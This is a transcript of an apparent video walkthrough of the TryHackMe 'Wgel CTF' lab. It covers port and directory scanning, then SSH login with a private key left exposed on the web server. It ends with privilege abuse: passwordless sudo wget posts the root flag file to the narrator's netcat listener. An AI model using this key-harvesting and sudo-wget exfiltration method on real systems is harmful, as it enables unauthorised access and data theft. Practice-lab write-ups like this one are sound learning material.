Hello guys, welcome to another video here on Tryhackme, and today I'll be solving this CTF lab called Wgel Ctf. It's basically an easy lab, and here we're going to exfiltrate the root flag. So basically here is just say have fun with this easy box. We're going to get the user flag and the root flag, and without further ado I'll just start the machine. Once it's ready, we'll proceed. Alright, as you can see, our IP address is ready. So the first thing I usually do once I start a box is just to ping the IP address and to be sure that the IP address is working. So I'm going to ping that, and as you can see it's working. So I'm just going to make a directory in case there's files that we need to save. We're going to call that directory wgel. Okay, hit enter and then just seed into wgel. Okay, so the first thing we do is to do some recon. So I'm going to use Nmap. I like to use -s sc for scripts and -sv for version. Put the IP address as easy as that and hit enter. This might take a couple of seconds, and let's wait and see. Voila, so we have our Nmap result out. We can see we have a port 22, the SSH port is open, and we also have a port 80 HTTP web open. Now normally we would start enumeration, but we can't use SSH because we have no credentials at the moment. So we're going to try to access this web here using the HTTP on port 80 and see what it gives us. So opening this, we just paste our IP address. You can just hit enter, or you just put port 80, and hit enter. Alright, what we see here is an Apache to Ubuntu default page. Doesn't seem like there's much here. Configuration overview, etc Apache 2. Usually this is more like how you see the Apache default page, but something I like to do some basic enumeration here. I like to check out the source code by viewing the page source. You can do that with just Ctrl U, and let's see if there's anything we can find on these comments. Usually I look out for the comments. Okay, Jesse, don't forget to update the website. Okay, this looks like something important. I think we have a name here, Jesse. I'm just going to copy this. Let me just open up my mouse pad here. I'll just paste that. I think what I need is just the name. I just need the name here, Jesse. Okay, all right, so let's minimize that. Anything else? Okay, so nothing else for now. Something else I like to try, I usually like to try, let me see, let me just copy this. I usually like to try robots.txt and see what I get. robots.txt, and see if there's anything. Alright, we can't find anything. Okay, next I'm going to run a Gobuster. I'm going to bust some directory on that particular site, so I'm going to use Gobuster. Okay, Gobuster, we're busting directories, and I'm checking HTTP. No, so -u for the URL. I'm sorry, HTTP. I'm going to put that here, and you can leave or just add port 80. Okay, the word list, I like to use the command.txt file I usually found in user share under word list. I think it's under dip, yeah, dip and command.txt. yeah, so I'm just going to run this and let's see what happens. Okay, it's running, so we'll just wait a couple of seconds. Once it's done, then we can go from there. Alright, perfect. So we have our Gobuster is done, finished, and we'll see a couple of results. Usually this 403 is going to give us an error, I believe. Now the index.html here, status 200 is usually the default page, and then we have server status. So I'm going to check that out. We'll check that out here. Okay, let me see. I don't think I need that. Okay, so I'll check out server status and nothing. So we check out the last one here. It's sitemap. I didn't remember. Usually once I check robot.txt, I usually check that out. So but let's just do that now. Okay, hit enter. Okay, leads us to an Nmap. Take on your biggest projects. So what do we have here? Control U. Let me see. Facebook and Twitter integration. Okay. Okay, let me see. Just checking to see if there's anything else here. So I'll close here. Home, about, work.txt, work. I think this might have some directories as well. Maybe it might have some hidden directories. About. Okay, this might be some names that. Okay, I don't think. All right, let's just run a quick Gobuster on this directory we found. So I'm going to bust more directory on the site map. Okay, hit enter. So let's wait for the result and then let's see what we can find. Okay. Ooh, okay, looks like we have .ssh. Let's see what we can find there. So on that sitemap, I'm going to check out .ssh. Hit enter. Interesting. Okay, now we have id underscore RSA. There are two things you can do. You can just let's click here and see. Let me open this. All right, looks like we got a private key, guys. So this is a private key that we can probably use to log into the name here, Jesse, on that IP address. So all right, I think we're getting somewhere. So two things: you can either copy this and use Nano to do this, but I think I have a faster way. Let me go back and see if it was. I'll control copy link, and while this is still searching, but I'm sure I think maybe we got a heads up here. So I'm just going to use wget, copy this and paste this, hit enter. ls, we have id.rsa. Usually once you have this, you might want to change. Let me tell you why. ls-lah id underscore rsa, hit enter. Usually you need to just change the mode to 600 to give the permission. All right, underscore id rsa, hit enter. ls-lah, let's see. Notice the difference. So now that we've done that, I think it's time for us to actually log in. Let me just go to the next page. Okay, so I'm going to use ssh-i. You use the -i when you're adding, and by the way, it was still under this particular folder, so I'm good to go. So ssh, let me even see if this is done. I don't think I'll be needing any images. Okay, let's just try. Forget the initial access, then I don't need that. ssh-i id rsa, and then the name of the person we saw, Jesse. Okay, Jesse, at the IP address. I'm sorry, let me copy this. So at the IP address, okay, paste, hit enter, and hit yes to accept. Okay, voila, I think we have an initial access ID. Okay, who am I? No, sorry, who am I? Hit enter. Jesse. All right, let's ls. Okay, we have desktop document download example.txt. Let's just cd into documents and see what's up. Hit enter. ls. All right, we have user flag.txt, so I'm just going to cut user flag.txt, enter, and we got our first flag. Okay, Ctrl C that, and let's go back to oh sorry, that's my VPN. Let's go back to Tryhackme here, paste that, hit submit, and yes, we got our first flag, user flag. Now we need to escalate privilege. we need to escalate the privilege to root. Usually the first thing you might just want to do is just use sudo -l. Let's see what Jesse is privileged to do in this machine. Okay, user Jesse may run the following commands on cop1, and that is, without password he can use wget binary. Interesting. So let's look for how we can exploit or take advantage of the wget binary. We can go to gtf beans, I think. Okay, gtfo beans. All right, under this part, what you just need to search the binary is wget, and I think we need sudo wget use -axpass equals to. Alright, I think this might be a little bit complicated. So look at what sudo can still work when we want to use file upload or file download. So my idea now is this: since we have user_flag.txt, we can get the root folder or the root file that we're looking for by probably putting root_root.txt. So let's use a file download, and what we can do is wget URL. This URL is the URL of our attacker, and the file is the file name. Okay, but let me see, file upload or file download, which one is it? I think the both. I will just try the both and let's see what happens. Okay, post file wget URL-0, then the file. Let's try this and see. Okay, but we're going to use sudo in the first case. So I'm going to use, but before we do this, we need to get our URL for the attacker has to have something with a netcat listener. So I'm going to open a netcat listener, nc-nlvp. Let's open that on port 443. So our netcat is running, so it's going to be my IP address colon my IP address colon my port number would be the IP address of the attacker. So what I'm going to do is I'm going to go back here and I'm going to use sudo wget, and let's look at that again for file download. So URL-0, then the file. URL is, let me see here, the URL is http, my IP address is 10.17.10.56, and the port number is 443-0. I think is it -0 or -o? Guys, I don't know what this is, but if it fails then I'll try -o. I'm not sure if this is -0. I think this is -o, then the file. Let me go back and see. So I'm going to use -o. I've not seen anything where you use -0. Whoa, I think let's try -0. And then the file we want to download is going to be on the root directory, and it's also going to be what we'll call the root underscore flag.txt. Alright, so we have our port open, and let's hit enter and see. Invalid. Okay, there's nothing, it's not going to be 0, so let's use O. Okay, so I'm going to use O, hit enter, and let's see. Did anything happen? Nothing. So you know what, I'm going to use the post request. wget -post file equals to the file I'm posting. I want to post that file to the URL of the attacker. So where URL is the URL of the attacker and the file I'm sending. I think that's what I'm doing. Download is like to download a file into the machine. Alright, so I think that's what I got wrong. So let me just go back and let's do this way. So you're going to be sudo. So it's going to be sudo wget -post -file equals to the file name is root, is in root, and then the file name is root underscore flag.txt, and we want to send it to http 10.17.10.56. all right, and then I'm going to attach the port number 443. I think that's it. Hit enter and let's see. Resolving to, what's that? Field name of the service not known. Let me see here. 443, that's my IP address. 10.17.10.56, 10.17.10.56. Oh, okay, I've seen my mistakes, guys. Oh my god. So I have http colon then slash guys. Hit enter. Fine. So we have connecting to this is connected, and then http request sent awaiting response. If I click here, okay. Was this because of the first one? I'm not sure. We got a live request here. So was wget unable to resolve host address http? I think that was the first one. Let me cancel this. Okay, and let me enter again on port 443. So sudo wget -- post file. We want to look at roots underscore flag.txt. we want to send it to http, or should I just use the IP address and the port number? Alright, let me just try the IP address and the port number, and let's see if that works. I'm not sure. Hit enter. Connected, http request sent awaiting response. So I think this should work now. Okay, did it. But what's gonna happen is I'm gonna quickly disconnect here. I'm gonna quickly terminate this. Okay, so I terminate. I'm just going to create a new IP address, and then once I start that, I will log in again. So while that is running, I can quickly come here to exit. So I'm exited terminal, so I'm just going to re-log in again once it's ready. I'm not sure what I did wrong, but that was supposed to work, so let's just try and see. So I'm thinking the issue is when I ran the file download code, it might have sent a file that disrupted the file that was saved there previously. So okay, so the IP is ready. Let's see, ls. We still have the code here, so I'm going to ssh-i id rsa, and then Jesse at the IP. Hit enter, hit yes. Alright, so we have entry, so I'm just going to sudo -l, hit enter. Okay, so wget, so I'm just going to go straight to run that code. So using sudo, I'm going to use wget, and then -post. We want to post a file to ourselves, and the file is in root, and the name is probably going to be root underscore flag.txt. Alright, and then the IP address is http, and then my IP address is 10.17. making that same mistake again, so it's going to be 10.17.10.56. I'm going to use a port number 443. So before I run this, let me quickly open up a port number here, NC-NLVP 443. hit enter. That's running. So let me look at the code again. So over here we just have wget dash dash post dash file, the file name, and then the URL. So that's exactly what we're doing. So sudo wget dash dash post dash file equals to root underscore flag.txt and 10.17.10.56 port 443. Hit enter. We have connected, awaiting response. So once I go back here, voila. So I think the issue here is when I did the file upload, format, I think maybe, sorry, file download format, I think maybe I messed with the file in the system, hence why I had to disconnect from the previous IP that I was using for the machine, so it will restart, and here we have the flag for the root. I think I learned something today. It might not really be anything, but yeah, it made sense. I was about giving up because I figured that, yeah, basically that's it. So we'll solve the lab. Thank you guys for sticking with me, and thank you for learning with me. I'll see you guys in the next video. Ciao.